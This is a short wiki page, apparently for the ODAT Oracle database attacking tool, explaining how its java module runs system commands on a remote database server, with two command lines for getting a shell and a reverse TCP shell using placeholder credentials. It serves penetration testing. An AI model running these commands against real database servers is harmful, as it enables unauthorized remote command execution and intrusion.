Skip to content
quentinhardy edited this page Mar 24, 2016 · 2 revisions

Get a remote shell

This module can be used to execute system commands on a remote database server. Useful to get a shell or a reverse tcp shell.

  • To get a shell on the database server:
./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --shell
  • To get a reverse tcp shell:
./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --reverse-shell
Clone this wiki locally